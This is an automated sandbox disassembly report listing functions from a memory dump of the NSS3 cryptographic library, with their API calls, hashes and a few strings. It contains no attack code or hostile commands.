Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: UnlockUtil$Alloc_$BlockCriticalEnterErrorItem_K11_SectionSizeValueZfreememcpymemset
String ID:
API String ID: 2753656479-0
Opcode ID: 197c909c5b75043c527893e57a84ea86fe1f574da8131323353e4d71e201404b
Instruction ID: 0fe6189b5456339636149582dbee73f490ee66d67dd37dac799d6f2ec876cd97
Opcode Fuzzy Hash: 197c909c5b75043c527893e57a84ea86fe1f574da8131323353e4d71e201404b
Instruction Fuzzy Hash: B65152B5E0010AAFDB00DFA8DD80AEEB7B4BF09358F144165E905A7711E731ED54CBA9

Function 6C6B8F80 Relevance: 12.2, APIs: 8, Instructions: 158memoryCOMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?,?,FFFFE005,?,6C6B7313), ref: 6C6B8FBB

Part of subcall function 6C6B07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C658298,?,?,?,6C64FCE5,?), ref: 6C6B07BF
Part of subcall function 6C6B07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C6B07E6
Part of subcall function 6C6B07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6B081B
Part of subcall function 6C6B07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6B0825

SECOID_FindOID_Util.NSS3(?,?,?,FFFFE005,?,6C6B7313), ref: 6C6B9012
SECOID_FindOID_Util.NSS3(?,?,?,?,FFFFE005,?,6C6B7313), ref: 6C6B903C
SECITEM_CompareItem_Util.NSS3(?,?,?,?,?,?,FFFFE005,?,6C6B7313), ref: 6C6B909E
PORT_ArenaGrow_Util.NSS3(?,?,?,00000001,?,?,?,?,?,?,FFFFE005,?,6C6B7313), ref: 6C6B90DB
PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,FFFFE005,?,6C6B7313), ref: 6C6B90F1

Part of subcall function 6C6B10C0: TlsGetValue.KERNEL32(?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B10F3
Part of subcall function 6C6B10C0: EnterCriticalSection.KERNEL32(?,?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B110C
Part of subcall function 6C6B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B1141
Part of subcall function 6C6B10C0: PR_Unlock.NSS3(?,?,?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B1182
Part of subcall function 6C6B10C0: TlsGetValue.KERNEL32(?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B119C

PR_SetError.NSS3(FFFFE005,00000000,?,?,?,FFFFE005,?,6C6B7313), ref: 6C6B906B

Part of subcall function 6C6FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6FC2BF

PR_SetError.NSS3(FFFFE005,00000000,?,FFFFE005,?,6C6B7313), ref: 6C6B9128

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Util$Error$ArenaFindValue$HashLookupTable$Alloc_AllocateCompareConstCriticalEnterGrow_Item_SectionUnlock
String ID:
API String ID: 3590961175-0
Opcode ID: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
Instruction ID: 1118a76c51b2bf7d005021de871d9f0fcf22768da21067c2da13a14fda83640f
Opcode Fuzzy Hash: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
Instruction Fuzzy Hash: 9251C571B002029FEB10CF6ADC84B66B3F9AF5535CF154029D919E7B61EB31E824CB99

Function 6C6988E0 Relevance: 12.1, APIs: 8, Instructions: 112COMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C6988FC

Part of subcall function 6C6ABE30: SECOID_FindOID_Util.NSS3(6C66311B,00000000,?,6C66311B,?), ref: 6C6ABE44

PORT_NewArena_Util.NSS3(00000800), ref: 6C698913

Part of subcall function 6C6B0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6587ED,00000800,6C64EF74,00000000), ref: 6C6B1000
Part of subcall function 6C6B0FF0: PR_NewLock.NSS3(?,00000800,6C64EF74,00000000), ref: 6C6B1016
Part of subcall function 6C6B0FF0: PL_InitArenaPool.NSS3(00000000,security,6C6587ED,00000008,?,00000800,6C64EF74,00000000), ref: 6C6B102B

SEC_ASN1DecodeItem_Util.NSS3(00000000,?,6C77D864,?), ref: 6C698947

Part of subcall function 6C6AE200: PR_SetError.NSS3(FFFFE009,00000000), ref: 6C6AE245
Part of subcall function 6C6AE200: PORT_FreeArena_Util.NSS3(00000000,00000001), ref: 6C6AE254

SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C69895B
DER_GetInteger_Util.NSS3(?), ref: 6C698973
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C698982
SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C6989EC
PR_SetError.NSS3(FFFFE006,00000000), ref: 6C698A12

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Util$Arena_Tag_$AlgorithmErrorFindFree$ArenaDecodeInitInteger_Item_LockPoolcalloc
String ID:
API String ID: 2145430656-0
Opcode ID: bf04e23255838017805b5453d337fd8095bdc839b210c2d2cbb3436b7b7a0192
Instruction ID: 1b6fb298a05b73490e2c4824226a6572498dc460874814be70e0698ae98999a9
Opcode Fuzzy Hash: bf04e23255838017805b5453d337fd8095bdc839b210c2d2cbb3436b7b7a0192
Instruction Fuzzy Hash: 8131BDB2A0860117F710423DAC01BEA72999F9A31CF240737D919D3BB2FB35C846828F

Function 6C64AB70 Relevance: 12.1, APIs: 8, Instructions: 104pipeCOMMON

Download Yara Rule

APIs

CreatePipe.KERNEL32(?,?,?,00000000), ref: 6C64ABAF
GetLastError.KERNEL32 ref: 6C64AC44
PR_SetError.NSS3(FFFFE896,00000000), ref: 6C64AC50

Part of subcall function 6C6FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6FC2BF

PR_SetError.NSS3(FFFFE890,00000000), ref: 6C64AC62
CloseHandle.KERNEL32(?), ref: 6C64AC75
CloseHandle.KERNEL32(?), ref: 6C64AC7A

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Error$CloseHandle$CreateLastPipeValue
String ID:
API String ID: 4247729451-0
Opcode ID: e56101c1638028da68d2b1265ce526e91b5448eadebaf6ebb33453f61b040869
Instruction ID: dd7357f512fe6dac2e0c1c7bf47a9a75988469a3f3237677b76c3ad7db86337b
Opcode Fuzzy Hash: e56101c1638028da68d2b1265ce526e91b5448eadebaf6ebb33453f61b040869
Instruction Fuzzy Hash: 9D31E175A00105EFDB14DFA8DD489AEBBF4FF89308B25C068D9099B361D732AC05CB98

Function 6C674A10 Relevance: 12.1, APIs: 8, Instructions: 80COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(6C675385,?,?,00000000), ref: 6C674A29
EnterCriticalSection.KERNEL32 ref: 6C674A42
TlsGetValue.KERNEL32 ref: 6C674A5F
EnterCriticalSection.KERNEL32 ref: 6C674A78
PL_HashTableLookup.NSS3 ref: 6C674A91
PR_Unlock.NSS3 ref: 6C674A9E
PR_Now.NSS3 ref: 6C674AAD
PR_Unlock.NSS3 ref: 6C674AD2

Part of subcall function 6C6407A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C5D204A), ref: 6C6407AD
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5D204A), ref: 6C6407CD
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5D204A), ref: 6C6407D6
Part of subcall function 6C6407A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C5D204A), ref: 6C6407E4
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,6C5D204A), ref: 6C640864
Part of subcall function 6C6407A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C640880
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,?,6C5D204A), ref: 6C6408CB
Part of subcall function 6C6407A0: TlsGetValue.KERNEL32(?,?,6C5D204A), ref: 6C6408D7
Part of subcall function 6C6407A0: TlsGetValue.KERNEL32(?,?,6C5D204A), ref: 6C6408FB

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlockcalloc$HashLookupTable
String ID:
API String ID: 326028414-0
Opcode ID: 49afbd64fb7792af9e626baff7586df3f9687b7a1cf84f14909142390b9b0bb9
Instruction ID: 2c0d06aa2c3677aeb51358410604608e07debde0265ed04b76fec024ade5d79e
Opcode Fuzzy Hash: 49afbd64fb7792af9e626baff7586df3f9687b7a1cf84f14909142390b9b0bb9
Instruction Fuzzy Hash: 2A314F75A04A119FCB10EF78D08846ABBF4FF09354B058A69EC9997704EB30E895CFD9

Function 6C674BA0 Relevance: 12.1, APIs: 8, Instructions: 80COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(6C67A6A2,?,?,00000000), ref: 6C674BB9
EnterCriticalSection.KERNEL32 ref: 6C674BD2
TlsGetValue.KERNEL32 ref: 6C674BEF
EnterCriticalSection.KERNEL32 ref: 6C674C08
PL_HashTableLookup.NSS3 ref: 6C674C21
PR_Unlock.NSS3 ref: 6C674C2E
PR_Now.NSS3 ref: 6C674C3D
PR_Unlock.NSS3 ref: 6C674C62

Part of subcall function 6C6407A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C5D204A), ref: 6C6407AD
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5D204A), ref: 6C6407CD
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5D204A), ref: 6C6407D6
Part of subcall function 6C6407A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C5D204A), ref: 6C6407E4
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,6C5D204A), ref: 6C640864
Part of subcall function 6C6407A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C640880
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,?,6C5D204A), ref: 6C6408CB
Part of subcall function 6C6407A0: TlsGetValue.KERNEL32(?,?,6C5D204A), ref: 6C6408D7
Part of subcall function 6C6407A0: TlsGetValue.KERNEL32(?,?,6C5D204A), ref: 6C6408FB

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlockcalloc$HashLookupTable
String ID:
API String ID: 326028414-0
Opcode ID: 8d385156b60762cedcbc1d6654c06768532677bdb4938bb55693b8563f7f19fd
Instruction ID: 4519b6481b203f678828650b4a1cd470f48232ec16b8daff587c3b9eb76361d6
Opcode Fuzzy Hash: 8d385156b60762cedcbc1d6654c06768532677bdb4938bb55693b8563f7f19fd
Instruction Fuzzy Hash: 85314FB5A046019FCB10EF78D08846ABBF4FF09354B058969EC9987710EB30E894CFE5

Function 6C760860 Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

PR_LogFlush.NSS3(00000000,00000000,?,?,6C767AE2,?,?,?,?,?,?,6C76798A), ref: 6C76086C

Part of subcall function 6C760930: EnterCriticalSection.KERNEL32(?,00000000,?,6C760C83), ref: 6C76094F
Part of subcall function 6C760930: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?,?,6C760C83), ref: 6C760974
Part of subcall function 6C760930: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C760983
Part of subcall function 6C760930: _PR_MD_UNLOCK.NSS3(?,?,6C760C83), ref: 6C76099F

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,00000000,00000000,?,?,6C767AE2,?,?,?,?,?,?,6C76798A), ref: 6C76087D
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,6C767AE2,?,?,?,?,?,?,6C76798A), ref: 6C760892
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,6C76798A), ref: 6C7608AA
free.MOZGLUE(?,00000000,00000000,?,?,6C767AE2,?,?,?,?,?,?,6C76798A), ref: 6C7608C7
free.MOZGLUE(?,00000000,00000000,?,?,6C767AE2,?,?,?,?,?,?,6C76798A), ref: 6C7608E9
free.MOZGLUE(?,6C767AE2,?,?,?,?,?,?,6C76798A), ref: 6C7608EF
PR_DestroyLock.NSS3(?,00000000,00000000,?,?,6C767AE2,?,?,?,?,?,?,6C76798A), ref: 6C76090E

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: free$__acrt_iob_func$CriticalDestroyEnterFlushLockSectionfclosefflushfwrite
String ID:
API String ID: 3145526462-0
Opcode ID: 80be37298469ec374bdb9084c00ddcbe2813f5a6ec0a9c14c8cd2e19b967e31d
Instruction ID: 15ba6877366d39f329553ffe7d7c969aa2aff5ab7c212b8f4829817ea0cc606a
Opcode Fuzzy Hash: 80be37298469ec374bdb9084c00ddcbe2813f5a6ec0a9c14c8cd2e19b967e31d
Instruction Fuzzy Hash: A81186B1B012425BFF009F9AEA45B4A3778AB4135DF290134E81657B40DF32E814CBDA

Function 6C6D8D20 Relevance: 10.8, APIs: 7, Instructions: 290memorythreadCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFD002,00000000), ref: 6C6D8E19
free.MOZGLUE(?), ref: 6C6D8E2D
PORT_Alloc_Util.NSS3(?), ref: 6C6D8F01
memcpy.VCRUNTIME140(?,?,?), ref: 6C6D8F57
free.MOZGLUE(?), ref: 6C6D8F7D
PR_GetCurrentThread.NSS3 ref: 6C6D8F8A
PR_SetError.NSS3(FFFFD044,00000000), ref: 6C6D90D6

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Errorfree$Alloc_CurrentThreadUtilmemcpy
String ID:
API String ID: 4163001165-0
Opcode ID: ab36cbb581520c01dbca69bb5957cf678fde39da7314ef43bf179a442c81054f
Instruction ID: d04a65243f712b49e76dae7cd9b0e0ec1790b903ed53cc0f7c736b28f99aa64b
Opcode Fuzzy Hash: ab36cbb581520c01dbca69bb5957cf678fde39da7314ef43bf179a442c81054f
Instruction Fuzzy Hash: CDA108706043029BE710CF24CC54BAB73E5EF89308F06592EE949CB662E731F645CB9A

Function 6C6C8C10 Relevance: 10.8, APIs: 7, Instructions: 279COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6C6C8C93

Part of subcall function 6C6FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6FC2BF

Part of subcall function 6C6A8A60: TlsGetValue.KERNEL32(6C6561C4,?,6C655F9C,00000000), ref: 6C6A8A81
Part of subcall function 6C6A8A60: TlsGetValue.KERNEL32(?,?,?,6C655F9C,00000000), ref: 6C6A8A9E
Part of subcall function 6C6A8A60: EnterCriticalSection.KERNEL32(?,?,?,?,6C655F9C,00000000), ref: 6C6A8AB7
Part of subcall function 6C6A8A60: PR_Unlock.NSS3(?,?,?,?,?,6C655F9C,00000000), ref: 6C6A8AD2

memset.VCRUNTIME140(?,00000000,?), ref: 6C6C8CFB
memset.VCRUNTIME140(?,00000000,?), ref: 6C6C8D10

Part of subcall function 6C6A8970: TlsGetValue.KERNEL32(?,00000000,6C6561C4,?,6C655639,00000000), ref: 6C6A8991
Part of subcall function 6C6A8970: TlsGetValue.KERNEL32(?,?,?,?,?,6C655639,00000000), ref: 6C6A89AD
Part of subcall function 6C6A8970: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C655639,00000000), ref: 6C6A89C6
Part of subcall function 6C6A8970: PR_WaitCondVar.NSS3 ref: 6C6A89F7
Part of subcall function 6C6A8970: PR_Unlock.NSS3(?,?,?,?,?,?,?,6C655639,00000000), ref: 6C6A8A0C

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlockmemset$CondErrorWait
String ID:
API String ID: 2412912262-0
Opcode ID: 1b1a15cdcad88a5dcc99ec77ba732f06703b0f6e38a8a2ae2e9b66ee29ea5060
Instruction ID: f4dfb93bfd321d74d892a3a58e1af5674c363b9a2cd559ff22d3f7313e7d0738
Opcode Fuzzy Hash: 1b1a15cdcad88a5dcc99ec77ba732f06703b0f6e38a8a2ae2e9b66ee29ea5060
Instruction Fuzzy Hash: 72B191B0E003099FDB14CF65DC40AAEB7BAFF49308F14412EE81A97751E731A955CB9A

Function 6C66CB60 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 253COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE041,00000000,?,?,?,?,00000000,?,00000000,?,6C6757DF,00000000,?,00000002,6C675840,?), ref: 6C66CBB5
TlsGetValue.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,?,6C6757DF,00000000,?,00000002,6C675840,?), ref: 6C66CC4A
EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,?,00000000,?,00000000,?,6C6757DF,00000000,?,00000002,6C675840), ref: 6C66CC5E
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C66CC98
PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C66CD50

Strings

@Xgl, xrefs: 6C66CB6C, 6C66CD8D, 6C66CDA3

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Unlock$CriticalEnterErrorSectionValue
String ID: @Xgl
API String ID: 1974170392-3058116666
Opcode ID: 3b77cf8aaa5dc52e7fda71b5169a7fba59097ab09b1bb801a29a99d564737c9a
Instruction ID: 8135871820f42a5da64ce8dd47a349e85e9eabbd1ed3a13fa4bd4113518ffafd
Opcode Fuzzy Hash: 3b77cf8aaa5dc52e7fda71b5169a7fba59097ab09b1bb801a29a99d564737c9a
Instruction Fuzzy Hash: AA91C675E01618AFDF00DFAAD884A9EB7B5FF49318F140125E816A7B10D731E815CBDA

Function 6C5D4F60 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 211stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C5D4FC4
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,0002996C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C5D51BB

Strings

unable to delete/modify user-function due to active statements, xrefs: 6C5D51DF
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C5D51A5
%s at line %d of [%.10s], xrefs: 6C5D51B4
misuse, xrefs: 6C5D51AF

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: sqlite3_logstrlen
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify user-function due to active statements
API String ID: 3619038524-4115156624
Opcode ID: 23aec3158eb36cd71a922ca6464db2d7ac32d2646da115e5aa56edf0d904808a
Instruction ID: af64a388a2ca5f424c4088241856b29a800d45edfbb198c0252b61ad341ef0ba
Opcode Fuzzy Hash: 23aec3158eb36cd71a922ca6464db2d7ac32d2646da115e5aa56edf0d904808a
Instruction Fuzzy Hash: 1C71ADB160430ADBEB00CF59CD80B9A77B9FB48308F4A4524ED199BB81D331F951CBA5

Function 6C6C29E0 Relevance: 10.7, APIs: 7, Instructions: 181COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE002,00000000,00000000,00000000,?,?,6C6C21DD,00000000), ref: 6C6C2A47
SEC_ASN1EncodeInteger_Util.NSS3(?,6C6C21DD,00000002,00000000,00000000,?,?,6C6C21DD,00000000), ref: 6C6C2A60
SECOID_FindOIDByTag_Util.NSS3(00000000,?,?,?,?,00000000,00000000,?,?,6C6C21DD,00000000), ref: 6C6C2A8E
PK11_KeyGen.NSS3(00000000,?,00000000,83F089CA,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C6C2AE9
PORT_ArenaMark_Util.NSS3(00000000), ref: 6C6C2B0D
PK11_FreeSymKey.NSS3(?), ref: 6C6C2B7B
PK11_FreeSymKey.NSS3(?), ref: 6C6C2BD6

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

